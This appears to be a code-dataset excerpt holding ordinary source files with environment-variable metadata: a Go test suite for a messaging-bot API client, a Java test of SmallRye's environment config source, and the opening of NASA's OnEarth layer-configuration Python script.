["uuid", "SSH_ORIGINAL_COMMAND"]
|
go
| 2 | 0 | |
v1/client_test.go
|
package v1
import (
"bytes"
"encoding/json"
"fmt"
"log"
"math/rand"
"net/http"
"os"
"strconv"
"strings"
"testing"
"time"
"github.com/joho/godotenv"
"github.com/stretchr/testify/assert"
"gopkg.in/h2non/gock.v1"
)
const (
letterBytes = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
letterIdxBits = 6 // 6 bits to represent a letter index
letterIdxMask = 1<<letterIdxBits - 1 // All 1-bits, as many as letterIdxBits
letterIdxMax = 63 / letterIdxBits // # of letter indices fitting in 63 bits
)
var src = rand.NewSource(time.Now().UnixNano())
func TestMain(m *testing.M) {
if os.Getenv("DEVELOPER_NODE") == "1" {
err := godotenv.Load("../.env")
if err != nil {
log.Fatal("Error loading .env file")
}
}
os.Exit(m.Run())
}
var (
mgURL = "https://api.example.com"
mgToken = "test_token"
debug, _ = strconv.ParseBool(os.Getenv("DEBUG"))
)
func client() *MgClient {
c := New(mgURL, mgToken)
if debug != false {
c.Debug = true
}
return c
}
func TestMgClient_Bots(t *testing.T) {
c := client()
defer gock.Off()
gock.New(mgURL).
Get("/api/bot/v1/bots").
Reply(200).
BodyString(`[{"id": 1, "name": "Test Bot", "created_at": "2018-01-01T00:00:00.000000Z", "is_active": true, "is_self": true}]`)
req := BotsRequest{Active: 1}
data, status, err := c.Bots(req)
if err != nil {
t.Errorf("%d %v", status, err)
}
assert.NoError(t, err)
assert.NotEmpty(t, data)
for _, bot := range data {
assert.NotEmpty(t, bot.CreatedAt)
}
}
func TestMgClient_Channels(t *testing.T) {
c := client()
defer gock.Off()
gock.New(mgURL).
Get("/api/bot/v1/channels").
Reply(200).
BodyString(`[
{
"id": 1,
"type": "custom",
"name": "Test custom channel",
"settings": {
"customer_external_id": "phone",
"sending_policy": {
"new_customer": "no",
"after_reply_timeout": "template"
},
"status": {
"delivered": "both",
"read": "receive"
},
"text": {
"creating": "both",
"editing": "receive",
"quoting": "send",
"deleting": "receive",
"max_chars_count": 777
},
"product": {
"creating": "receive",
"editing": "receive",
"deleting": "receive"
},
"order": {
"creating": "receive",
"editing": "receive",
"deleting": "receive"
},
"image": {
"creating": "both",
"quoting": "receive",
"editing": "none",
"deleting": "receive",
"max_items_count": 1,
"note_max_chars_count": 777
},
"file": {
"creating": "both",
"quoting": "receive",
"editing": "none",
"deleting": "receive",
"max_items_count": 1,
"note_max_chars_count": 777
},
"suggestions": {
"text": "receive",
"email": "receive",
"phone": "receive"
}
},
"created_at": "2018-01-01T00:00:00.000000Z",
"updated_at": null,
"activated_at": "2018-01-01T00:00:00.000000Z",
"deactivated_at": null,
"is_active": true
}
]`)
channels, status, err := c.Channels(ChannelsRequest{Active: 1})
assert.NoError(t, err)
assert.Equal(t, 200, status)
assert.Len(t, channels, 1)
ch := channels[0]
assert.Equal(t, uint64(1), ch.ID)
assert.Equal(t, ChannelTypeCustom, ch.Type)
assert.Equal(t, "Test custom channel", ch.Name)
assert.Equal(t, "2018-01-01T00:00:00.000000Z", ch.CreatedAt)
assert.Empty(t, ch.UpdatedAt)
assert.Equal(t, "2018-01-01T00:00:00.000000Z", ch.ActivatedAt)
assert.Empty(t, ch.DeactivatedAt)
assert.True(t, ch.IsActive)
chs := ch.Settings
assert.Equal(t, "phone", chs.CustomerExternalID)
assert.Equal(t, "no", chs.SendingPolicy.NewCustomer)
assert.Equal(t, "template", chs.SendingPolicy.AfterReplyTimeout)
assert.Equal(t, ChannelFeatureBoth, chs.Status.Delivered)
assert.Equal(t, ChannelFeatureReceive, chs.Status.Read)
assert.Equal(t, ChannelFeatureBoth, chs.Text.Creating)
assert.Equal(t, ChannelFeatureReceive, chs.Text.Editing)
assert.Equal(t, ChannelFeatureSend, chs.Text.Quoting)
assert.Equal(t, ChannelFeatureReceive, chs.Text.Deleting)
assert.Equal(t, uint16(777), chs.Text.MaxCharsCount)
assert.Equal(t, ChannelFeatureReceive, chs.Product.Creating)
assert.Equal(t, ChannelFeatureReceive, chs.Product.Editing)
assert.Equal(t, ChannelFeatureReceive, chs.Product.Deleting)
assert.Equal(t, ChannelFeatureReceive, chs.Order.Creating)
assert.Equal(t, ChannelFeatureReceive, chs.Order.Editing)
assert.Equal(t, ChannelFeatureReceive, chs.Order.Deleting)
assert.Equal(t, ChannelFeatureBoth, chs.Image.Creating)
assert.Equal(t, ChannelFeatureNone, chs.Image.Editing)
assert.Equal(t, ChannelFeatureReceive, chs.Image.Quoting)
assert.Equal(t, ChannelFeatureReceive, chs.Image.Deleting)
assert.Equal(t, 1, chs.Image.MaxItemsCount)
assert.Equal(t, uint16(777), chs.Image.NoteMaxCharsCount)
assert.Equal(t, ChannelFeatureBoth, chs.File.Creating)
assert.Equal(t, ChannelFeatureNone, chs.File.Editing)
assert.Equal(t, ChannelFeatureReceive, chs.File.Quoting)
assert.Equal(t, ChannelFeatureReceive, chs.File.Deleting)
assert.Equal(t, 1, chs.File.MaxItemsCount)
assert.Equal(t, uint16(777), chs.File.NoteMaxCharsCount)
assert.Equal(t, ChannelFeatureReceive, chs.Suggestions.Text)
assert.Equal(t, ChannelFeatureReceive, chs.Suggestions.Email)
assert.Equal(t, ChannelFeatureReceive, chs.Suggestions.Phone)
}
func TestMgClient_Users(t *testing.T) {
c := client()
defer gock.Off()
gock.New(mgURL).
Get("/api/bot/v1/users").
Reply(200).
BodyString(`[{"id": 1, "external_id":"1", "username": "Test", "first_name":"Test", "last_name":"Test", "created_at": "2018-01-01T00:00:00.000000Z", "is_active": true, "is_online": true}]`)
req := UsersRequest{Active: 1}
data, status, err := c.Users(req)
if err != nil {
t.Errorf("%d %v", status, err)
}
assert.NoError(t, err)
assert.NotEmpty(t, data)
for _, user := range data {
assert.NotEmpty(t, user.FirstName)
}
}
func TestMgClient_Customers(t *testing.T) {
c := client()
defer gock.Off()
gock.New(mgURL).
Get("/api/bot/v1/customers").
Reply(200).
BodyString(`[{"id": 1,"channel_id": 1, "created_at": "2018-01-01T00:00:00.000000Z"}]`)
req := CustomersRequest{}
data, status, err := c.Customers(req)
if err != nil {
t.Errorf("%d %v", status, err)
}
assert.NoError(t, err)
assert.NotEmpty(t, data)
for _, customer := range data {
assert.NotEmpty(t, customer.ChannelId)
}
}
func TestMgClient_Chats(t *testing.T) {
c := client()
defer gock.Off()
gock.New(mgURL).
Get("/api/bot/v1/chats").
Reply(200).
BodyString(`[{"id": 1,"customer": {"id": 1, "name": "Test"}, "created_at": "2018-01-01T00:00:00.000000Z"}]`)
req := ChatsRequest{ChannelType: ChannelTypeTelegram}
data, status, err := c.Chats(req)
if err != nil {
t.Errorf("%d %v", status, err)
}
assert.NoError(t, err)
assert.NotEmpty(t, data)
for _, chat := range data {
assert.NotEmpty(t, chat.Customer.Name)
}
}
func TestMgClient_Members(t *testing.T) {
c := client()
defer gock.Off()
gock.New(mgURL).
Get("/api/bot/v1/members").
Reply(200).
BodyString(`[{"id": 1,"user_id": 1, "chat_id": 1, "created_at": "2018-01-01T00:00:00.000000Z"}]`)
req := MembersRequest{State: ChatMemberStateLeaved}
data, status, err := c.Members(req)
if err != nil {
t.Errorf("%d %v", status, err)
}
assert.NoError(t, err)
for _, member := range data {
assert.NotEmpty(t, member.ChatID)
}
}
func TestMgClient_Dialogs(t *testing.T) {
c := client()
defer gock.Off()
gock.New(mgURL).
Get("/api/bot/v1/dialogs").
Reply(200).
BodyString(`[{"id": 1, "chat_id": 1, "created_at": "2018-01-01T00:00:00.000000Z"}]`)
req := DialogsRequest{Active: 0}
data, status, err := c.Dialogs(req)
if err != nil {
t.Errorf("%d %v", status, err)
}
assert.NoError(t, err)
assert.NotEmpty(t, data)
for _, dialog := range data {
assert.NotEmpty(t, dialog.ChatID)
}
}
func TestMgClient_DialogAssign(t *testing.T) {
c := client()
d := 1
u := 1
req := DialogAssignRequest{DialogID: uint64(d), UserID: uint64(u)}
r, _ := json.Marshal(req)
defer gock.Off()
gock.New(mgURL).
Patch("/api/bot/v1/dialogs/1/assign").
JSON(r).
Reply(400).
BodyString(`{"errors": ["dialog is not the latest in the chat"]}`)
_, status, err := c.DialogAssign(req)
assert.Error(t, err)
assert.Equal(t, http.StatusBadRequest, status)
}
func TestMgClient_DialogUnassign(t *testing.T) {
c := client()
defer gock.Off()
t.Run("success", func(t *testing.T) {
gock.New(mgURL).
Patch("/api/bot/v1/dialogs/777/unassign").
Reply(200).
BodyString(`{"previous_responsible": {"id": 111, "type": "bot", "assigned_at": "2020-07-14T14:11:44.000000Z"}}`)
resp, status, err := c.DialogUnassign(777)
assert.NoError(t, err)
assert.Equal(t, http.StatusOK, status)
assert.Equal(t, int64(111), resp.PreviousResponsible.ID)
assert.Equal(t, "bot", resp.PreviousResponsible.Type)
assert.Equal(t, "2020-07-14T14:11:44.000000Z", resp.PreviousResponsible.AssignAt)
})
t.Run("dialog not latest in chat", func(t *testing.T) {
gock.New(mgURL).
Patch("/api/bot/v1/dialogs/666/unassign").
Reply(400).
BodyString(`{"errors": ["dialog is not the latest in the chat"]}`)
_, status, err := c.DialogUnassign(666)
assert.Error(t, err, "dialog is not the latest in the chat")
assert.Equal(t, http.StatusBadRequest, status)
})
t.Run("dialog is not assigned", func(t *testing.T) {
gock.New(mgURL).
Patch("/api/bot/v1/dialogs/555/unassign").
Reply(400).
BodyString(`{"errors": ["dialog is not assigned"]}`)
_, status, err := c.DialogUnassign(555)
assert.Error(t, err)
assert.Equal(t, http.StatusBadRequest, status)
})
t.Run("dialog not found", func(t *testing.T) {
gock.New(mgURL).
Patch("/api/bot/v1/dialogs/444/unassign").
Reply(404).
BodyString(`{"errors": ["dialog #444 not found"]}`)
_, status, err := c.DialogUnassign(444)
assert.Error(t, err)
assert.Equal(t, http.StatusNotFound, status)
})
}
func TestMgClient_DialogClose(t *testing.T) {
c := client()
i := 1
defer gock.Off()
gock.New(mgURL).
Delete("/api/bot/v1/dialogs/1/close").
Reply(400).
BodyString(`{"errors": ["dialog #1 not found"]}`)
_, status, err := c.DialogClose(uint64(i))
assert.Error(t, err)
assert.Equal(t, http.StatusBadRequest, status)
}
func TestMgClient_Messages(t *testing.T) {
c := client()
defer gock.Off()
gock.New(mgURL).
Get("/api/bot/v1/messages").
Reply(200).
BodyString(`[{"id": 1, "time": "2018-01-01T00:00:00+03:00", "type": "text", "scope": "public", "chat_id": 1, "is_read": false, "is_edit": false, "status": "received", "created_at": "2018-01-01T00:00:00.000000Z"}]`)
req := MessagesRequest{ChannelType: ChannelTypeTelegram, Scope: MessageScopePublic}
data, status, err := c.Messages(req)
if err != nil {
t.Errorf("%d %v", status, err)
}
assert.NoError(t, err)
assert.NotEmpty(t, data)
for _, message := range data {
assert.NotEmpty(t, message.ID)
}
}
func TestMgClient_MessageSendText(t *testing.T) {
c := client()
i := uint64(1)
message := MessageSendRequest{
Type: MsgTypeText,
Scope: "public",
Content: "test",
ChatID: i,
}
defer gock.Off()
gock.New(mgURL).
Post("/api/bot/v1/messages").
JSON(message).
Reply(200).
BodyString(`{"message_id": 1, "time": "2018-01-01T00:00:00+03:00"}`)
data, status, err := c.MessageSend(message)
if err != nil {
t.Errorf("%d %v", status, err)
}
assert.NoError(t, err)
assert.NotEmpty(t, data.MessageID)
}
func TestMgClient_MessageSendTextWithSuggestions(t *testing.T) {
c := client()
i := uint64(1)
message := MessageSendRequest{
Type: MsgTypeText,
Scope: "public",
Content: "test message with suggestions",
ChatID: i,
TransportAttachments: &TransportAttachments{
Suggestions: []Suggestion{
{
Type: SuggestionTypeText,
Title: "text suggestion",
},
{Type: SuggestionTypeEmail},
{Type: SuggestionTypePhone},
},
},
}
defer gock.Off()
gock.New(mgURL).
Post("/api/bot/v1/messages").
JSON(message).
Reply(200).
BodyString(`{"message_id": 1, "time": "2018-01-01T00:00:00+03:00"}`)
data, status, err := c.MessageSend(message)
if err != nil {
t.Errorf("%d %v", status, err)
}
assert.NoError(t, err)
assert.NotEmpty(t, data.MessageID)
}
func TestMgClient_MessageSendProduct(t *testing.T) {
c := client()
message := MessageSendRequest{
Type: MsgTypeProduct,
ChatID: 5,
Scope: "public",
Product: &MessageProduct{
ID: 1,
Name: "Some Product",
Article: "Art-111",
Url: "https://example.com",
Img: "http://example.com/pic.jpg",
Cost: &MessageOrderCost{
Value: 29900,
Currency: "rub",
},
Quantity: &MessageOrderQuantity{
Value: 1,
},
},
}
defer gock.Off()
gock.New(mgURL).
Post("/api/bot/v1/messages").
JSON(message).
Reply(200).
BodyString(`{"message_id": 1, "time": "2018-01-01T00:00:00+03:00"}`)
msg, _, err := c.MessageSend(message)
if err != nil {
t.Errorf("%v", err)
}
assert.NoError(t, err)
t.Logf("%v", msg)
}
func TestMgClient_MessageSendOrder(t *testing.T) {
c := client()
message := MessageSendRequest{
Type: MsgTypeOrder,
ChatID: 5,
Scope: "public",
Order: &MessageOrder{
Number: RandStringBytesMaskImprSrc(7),
Cost: &MessageOrderCost{
Value: 29900,
Currency: MsgCurrencyRub,
},
Status: &MessageOrderStatus{
Code: MsgOrderStatusCodeNew,
Name: "Новый",
},
Delivery: &MessageOrderDelivery{
Name: "Курьерская доставка",
Address: "г. Москва, Проспект Мира, 9",
Price: &MessageOrderCost{
Value: 1100,
Currency: MsgCurrencyRub,
},
},
Items: []MessageOrderItem{
{
Name: "iPhone 6",
Url: "https://example.com/product.html",
Img: "https://example.com/picture.png",
Price: &MessageOrderCost{
Value: 29900,
Currency: MsgCurrencyRub,
},
Quantity: &MessageOrderQuantity{
Value: 1,
},
},
},
},
}
defer gock.Off()
gock.New(mgURL).
Post("/api/bot/v1/messages").
JSON(message).
Reply(200).
BodyString(`{"message_id": 1, "time": "2018-01-01T00:00:00+03:00"}`)
msg, _, err := c.MessageSend(message)
if err != nil {
t.Errorf("%v", err)
}
assert.NoError(t, err)
t.Logf("%v", msg)
}
func TestMgClient_RandomStringGenerator(t *testing.T) {
rnd := RandStringBytesMaskImprSrc(7)
assert.NotEmpty(t, rnd)
t.Logf("%v", rnd)
}
func TestMgClient_MessageEdit(t *testing.T) {
c := client()
message := MessageEditRequest{
ID: uint64(1),
Content: "test",
}
defer gock.Off()
gock.New(mgURL).
Patch("/api/bot/v1/messages/1").
JSON(message).
Reply(200).
BodyString(`{"message_id": 1, "time": "2018-01-01T00:00:00+03:00"}`)
e, status, err := c.MessageEdit(message)
if err != nil {
t.Errorf("%d %v", status, err)
}
t.Logf("Message edit: %v", e)
}
func TestMgClient_MessageDelete(t *testing.T) {
c := client()
defer gock.Off()
gock.New(mgURL).
Delete("/api/bot/v1/messages/1").
Reply(200).
BodyString(`{}`)
d, status, err := c.MessageDelete(1)
if err != nil {
t.Errorf("%d %v", status, err)
}
t.Logf("Message delete: %v", d)
}
func TestMgClient_Info(t *testing.T) {
c := client()
req := InfoRequest{Name: "AWESOME", Avatar: "https://test.com/awesome_bot_avatar"}
defer gock.Off()
gock.New(mgURL).
Patch("/api/bot/v1/my/info").
JSON(req).
Reply(200).
BodyString(`{}`)
_, status, err := c.Info(req)
if err != nil {
t.Errorf("%d %v", status, err)
}
assert.NoError(t, err)
}
func TestMgClient_Commands(t *testing.T) {
c := client()
defer gock.Off()
gock.New(mgURL).
Get("/api/bot/v1/my/commands").
Reply(200).
BodyString(`[{"id": 1, "name": "command_name", "description": "Command description", "created_at": "2018-01-01T00:00:00.000000Z"}]`)
req := CommandsRequest{}
data, status, err := c.Commands(req)
if err != nil {
t.Errorf("%d %v", status, err)
}
assert.NoError(t, err)
assert.NotEmpty(t, data)
for _, command := range data {
assert.NotEmpty(t, command.Description)
}
}
func TestMgClient_CommandEditDelete(t *testing.T) {
c := client()
req := CommandEditRequest{
Name: "test_command",
Description: "Test command",
}
defer gock.Off()
gock.New(mgURL).
Put("/api/bot/v1/my/commands/test_command").
JSON(req).
Reply(200).
BodyString(`{"id": 1, "name": "test_command", "description": "Test description"}`)
n, status, err := c.CommandEdit(req)
if err != nil {
t.Errorf("%d %v", status, err)
}
assert.NoError(t, err)
assert.NotEmpty(t, n.ID)
gock.New(mgURL).
Delete("/api/bot/v1/my/commands/test_command").
Reply(200).
BodyString(`{}`)
d, status, err := c.CommandDelete(n.Name)
if err != nil {
t.Errorf("%d %v", status, err)
}
assert.NoError(t, err)
t.Logf("%v", d)
}
func TestMgClient_WsMeta(t *testing.T) {
c := client()
events := []string{"user_updated", "user_join_chat"}
url, headers, err := c.WsMeta(events)
if err != nil {
t.Errorf("%v", err)
}
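	// WsMeta is expected to build a wss:// URL from the client URL plus the requested events and return headers carrying the bot token.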
resUrl := fmt.Sprintf("%s%s%s%s", strings.Replace(c.URL, "https", "wss", 1), prefix, "/ws?events=", strings.Join(events[:], ","))
resToken := c.Token
assert.Equal(t, resUrl, url)
assert.Equal(t, resToken, headers["X-Bot-Token"][0])
}
func TestMgClient_UploadFile(t *testing.T) {
c := client()
resp, err := http.Get("https://via.placeholder.com/300")
if err != nil {
t.Errorf("%v", err)
}
defer resp.Body.Close()
defer gock.Off()
gock.New(mgURL).
Post("/api/bot/v1/files/upload").
Reply(200).
BodyString(`{"created_at": "2018-01-01T00:00:00.000000Z", "hash": "hash", "id": "1"}`)
data, status, err := c.UploadFile(resp.Body)
if status != http.StatusOK {
t.Errorf("%v", err)
}
t.Logf("File %+v is upload", data)
}
func TestMgClient_UploadFileByUrl(t *testing.T) {
c := client()
file := UploadFileByUrlRequest{
Url: "https://via.placeholder.com/300",
}
defer gock.Off()
gock.New(mgURL).
Post("/api/bot/v1/files/upload_by_url").
JSON(file).
Reply(200).
BodyString(`{"created_at": "2018-01-01T00:00:00.000000Z", "hash": "hash", "id": "1"}`)
uploadFileResponse, st, err := c.UploadFileByURL(file)
if st != http.StatusOK {
t.Errorf("%v", err)
}
t.Logf("File %+v is upload", uploadFileResponse.ID)
assert.NoError(t, err)
}
func RandStringBytesMaskImprSrc(n int) string {
b := make([]byte, n)
// A src.Int63() generates 63 random bits, enough for letterIdxMax characters!
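// Each Int63() value is consumed letterIdxBits bits at a time; indices that fall outside letterBytes are rejected so every letter remains equally likely.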
for i, cache, remain := n-1, src.Int63(), letterIdxMax; i >= 0; {
if remain == 0 {
cache, remain = src.Int63(), letterIdxMax
}
if idx := int(cache & letterIdxMask); idx < len(letterBytes) {
b[i] = letterBytes[idx]
i--
}
cache >>= letterIdxBits
remain--
}
return string(b)
}
func TestMgClient_DebugNoLogger(t *testing.T) {
c := client()
c.Debug = true
var buf bytes.Buffer
log.SetOutput(&buf)
defer func() {
log.SetOutput(os.Stderr)
}()
c.writeLog("Test log string")
assert.Contains(t, buf.String(), "Test log string")
}
func TestMgClient_DebugWithLogger(t *testing.T) {
var buf bytes.Buffer
logger := log.New(&buf, "Custom log prefix ", 0)
c := client()
c.Debug = true
c.WithLogger(logger)
c.writeLog("Test log string")
assert.Contains(t, buf.String(), "Custom log prefix Test log string")
}
|
[
"\"DEVELOPER_NODE\"",
"\"DEBUG\""
] |
[] |
[
"DEBUG",
"DEVELOPER_NODE"
] |
[]
|
["DEBUG", "DEVELOPER_NODE"]
|
go
| 2 | 0 | |
implementation/src/test/java/io/smallrye/config/EnvConfigSourceTest.java
|
/*
* Copyright 2017 Red Hat, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.smallrye.config;
import static java.util.stream.Collectors.toList;
import static java.util.stream.StreamSupport.stream;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertFalse;
import static org.junit.jupiter.api.Assertions.assertNotNull;
import static org.junit.jupiter.api.Assertions.assertThrows;
import static org.junit.jupiter.api.Assertions.assertTrue;
import java.util.NoSuchElementException;
import java.util.stream.StreamSupport;
import org.eclipse.microprofile.config.spi.ConfigSource;
import org.junit.jupiter.api.Test;
/**
* @author <a href="http://jmesnil.net/">Jeff Mesnil</a> (c) 2018 Red Hat inc.
*/
class EnvConfigSourceTest {
@Test
void conversionOfEnvVariableNames() {
String envProp = System.getenv("SMALLRYE_MP_CONFIG_PROP");
assertNotNull(envProp);
ConfigSource cs = new EnvConfigSource();
assertEquals(envProp, cs.getValue("SMALLRYE_MP_CONFIG_PROP"));
// the config source returns only the name of the actual env variable
assertTrue(cs.getPropertyNames().contains("SMALLRYE_MP_CONFIG_PROP"));
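// getValue also resolves the dotted, dashed and lower-case variants below to the same env variable (non-alphanumeric characters map to '_' and the name is upper-cased), while getPropertyNames only lists the real variable name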
assertEquals(envProp, cs.getValue("smallrye_mp_config_prop"));
assertFalse(cs.getPropertyNames().contains("smallrye_mp_config_prop"));
assertEquals(envProp, cs.getValue("smallrye.mp.config.prop"));
assertFalse(cs.getPropertyNames().contains("smallrye.mp.config.prop"));
assertEquals(envProp, cs.getValue("SMALLRYE.MP.CONFIG.PROP"));
assertFalse(cs.getPropertyNames().contains("SMALLRYE.MP.CONFIG.PROP"));
assertEquals(envProp, cs.getValue("smallrye-mp-config-prop"));
assertFalse(cs.getPropertyNames().contains("smallrye-mp-config-prop"));
assertEquals(envProp, cs.getValue("SMALLRYE-MP-CONFIG-PROP"));
assertFalse(cs.getPropertyNames().contains("SMALLRYE-MP-CONFIG-PROP"));
assertEquals("1234", cs.getValue("smallrye_mp_config_prop_lower"));
assertTrue(cs.getPropertyNames().contains("smallrye_mp_config_prop_lower"));
}
@Test
void profileEnvVariables() {
assertNotNull(System.getenv("SMALLRYE_MP_CONFIG_PROP"));
assertNotNull(System.getenv("_ENV_SMALLRYE_MP_CONFIG_PROP"));
SmallRyeConfig config = new SmallRyeConfigBuilder().addDefaultSources().withProfile("env").build();
assertEquals("5678", config.getRawValue("smallrye.mp.config.prop"));
}
@Test
void empty() {
SmallRyeConfig config = new SmallRyeConfigBuilder().addDefaultSources().build();
assertThrows(NoSuchElementException.class, () -> config.getValue("SMALLRYE_MP_CONFIG_EMPTY", String.class));
assertTrue(
stream(config.getPropertyNames().spliterator(), false).collect(toList()).contains("SMALLRYE_MP_CONFIG_EMPTY"));
ConfigSource envConfigSource = StreamSupport.stream(config.getConfigSources().spliterator(), false)
.filter(configSource -> configSource.getName().equals("EnvConfigSource"))
.findFirst()
.get();
assertEquals("", envConfigSource.getValue("SMALLRYE_MP_CONFIG_EMPTY"));
}
@Test
void ordinal() {
SmallRyeConfig config = new SmallRyeConfigBuilder().withSources(new EnvConfigSource()).build();
ConfigSource configSource = config.getConfigSources().iterator().next();
assertTrue(configSource instanceof EnvConfigSource);
assertEquals(301, configSource.getOrdinal());
}
}
|
[
"\"SMALLRYE_MP_CONFIG_PROP\"",
"\"SMALLRYE_MP_CONFIG_PROP\"",
"\"_ENV_SMALLRYE_MP_CONFIG_PROP\""
] |
[] |
[
"_ENV_SMALLRYE_MP_CONFIG_PROP",
"SMALLRYE_MP_CONFIG_PROP"
] |
[]
|
["_ENV_SMALLRYE_MP_CONFIG_PROP", "SMALLRYE_MP_CONFIG_PROP"]
|
java
| 2 | 0 | |
src/layer_config/bin/oe_configure_layer.py
|
#!/bin/env python
# Copyright (c) 2002-2017, California Institute of Technology.
# All rights reserved. Based on Government Sponsored Research under contracts NAS7-1407 and/or NAS7-03001.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
# 3. Neither the name of the California Institute of Technology (Caltech), its operating division the Jet Propulsion Laboratory (JPL),
# the National Aeronautics and Space Administration (NASA), nor the names of its contributors may be used to
# endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE CALIFORNIA INSTITUTE OF TECHNOLOGY BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# oe_configure_layer.py
# The OnEarth Layer Configurator.
#
#
# Example XML configuration file:
#
'''
<?xml version="1.0" encoding="UTF-8"?>
<LayerConfiguration>
<Identifier>MODIS_Aqua_Cloud_Top_Temp_Night</Identifier>
<Title>MODIS AQUA Nighttime Cloud Top Temperature</Title>
<FileNamePrefix>MYR6CTTLLNI</FileNamePrefix>
<TiledGroupName>MODIS AQUA Nighttime Cloud Top Temperature tileset</TiledGroupName>
<Compression>PNG</Compression>
<TileMatrixSet>EPSG4326_2km</TileMatrixSet>
<EmptyTileSize offset="0">1397</EmptyTileSize>
<Projection>EPSG:4326</Projection>
<EnvironmentConfig>/layer_config/conf/environment_geographic.xml</EnvironmentConfig>
<ArchiveLocation static="false" year="true">/data/EPSG4326/MYR6CTTLLNI</ArchiveLocation>
<ColorMap>http://localhost/colormap/sample.xml</ColorMap>
<Time>DETECT</Time>
<Time>2014-04-01/DETECT/P1D</Time>
</LayerConfiguration>
'''
#
# Global Imagery Browse Services
# NASA Jet Propulsion Laboratory
import os
import subprocess
import sys
import urllib
import urllib2
import xml.dom.minidom
import logging
import shutil
import re
import distutils.spawn
import sqlite3
import glob
import json
from datetime import datetime, timedelta
from time import asctime, time as tm
from dateutil.relativedelta import relativedelta
from optparse import OptionParser
from lxml import etree
import cgi
from oe_configure_reproject_layer import build_reproject_configs, make_gdal_tms_xml, \
WMS_LAYER_GROUP_TEMPLATE, DIMENSION_TEMPLATE, VALIDATION_TEMPLATE, STYLE_TEMPLATE, MAPFILE_TEMPLATE
from oe_configure_remote_layers import get_remote_layers
from oe_utils import Environment, get_environment, sigevent, log_info_mssg, log_info_mssg_with_timestamp, log_the_command, bulk_replace
reload(sys)
sys.setdefaultencoding('utf8')
versionNumber = '1.3.8'
current_conf = None
class WMTSEndPoint:
"""End point data for WMTS"""
def __init__(self, path, cacheConfigLocation, cacheConfigBasename,
getCapabilities, projection):
self.path = path
self.cacheConfigLocation = cacheConfigLocation
self.cacheConfigBasename = cacheConfigBasename
self.getCapabilities = getCapabilities
self.projection = projection
class TWMSEndPoint:
"""End point data for TWMS"""
def __init__(self, path, cacheConfigLocation, cacheConfigBasename,
getCapabilities, getTileService, projection):
self.path = path
self.cacheConfigLocation = cacheConfigLocation
self.cacheConfigBasename = cacheConfigBasename
self.getCapabilities = getCapabilities
self.getTileService = getTileService
self.projection = projection
class WMSEndPoint:
"""End point data for WMS"""
def __init__(self, mapfileStagingLocation, mapfileLocation,
mapfileLocationBasename, mapfileConfigLocation,
mapfileConfigBasename):
self.mapfileStagingLocation = mapfileStagingLocation
self.mapfileLocation = mapfileLocation
self.mapfileLocationBasename = mapfileLocationBasename
self.mapfileConfigLocation = mapfileConfigLocation
self.mapfileConfigBasename = mapfileConfigBasename
class Projection:
"""Projection information for layer"""
def __init__(self, projection_id, projection_wkt, projection_bbox,
projection_tilematrixsets, projection_tilematrixset_xml,
projection_lowercorner, projection_uppercorner):
self.id = projection_id
self.wkt = projection_wkt
self.bbox_xml = projection_bbox
self.tilematrixsets = projection_tilematrixsets #returns TileMatrixSetMeta
self.tilematrixset_xml = projection_tilematrixset_xml
self.lowercorner = projection_lowercorner
self.uppercorner = projection_uppercorner
class TileMatrixSetMeta:
"""TileMatrixSet metadata for WMTS"""
def __init__(self, levels, scale):
self.levels = levels
self.scale = scale
warnings = []
errors = []
def log_sig_warn(mssg, sigevent_url):
"""
Send a warning to the log and to sigevent.
Arguments:
mssg -- 'message for operations'
sigevent_url -- Example: 'http://[host]/sigevent/events/create'
"""
# Send to log.
logging.warning(asctime() + " " + mssg)
global warnings
warnings.append(asctime() + " " + mssg)
# Send to sigevent.
try:
sigevent('WARN', mssg, sigevent_url)
except urllib2.URLError:
print 'sigevent service is unavailable'
def log_sig_err(mssg, sigevent_url):
"""
Send an error to the log and to sigevent.
Arguments:
mssg -- 'message for operations'
sigevent_url -- Example: 'http://[host]/sigevent/events/create'
"""
# Send to log.
logging.error(asctime() + " " + mssg)
global errors
errors.append(asctime() + " " + mssg)
# Send to sigevent.
try:
sigevent('ERROR', mssg, sigevent_url)
except urllib2.URLError:
print 'sigevent service is unavailable'
def log_sig_exit(type, mssg, sigevent_url):
"""
Send a message to the log, to sigevent, and then exit.
Arguments:
type -- 'INFO', 'WARN', 'ERROR'
mssg -- 'message for operations'
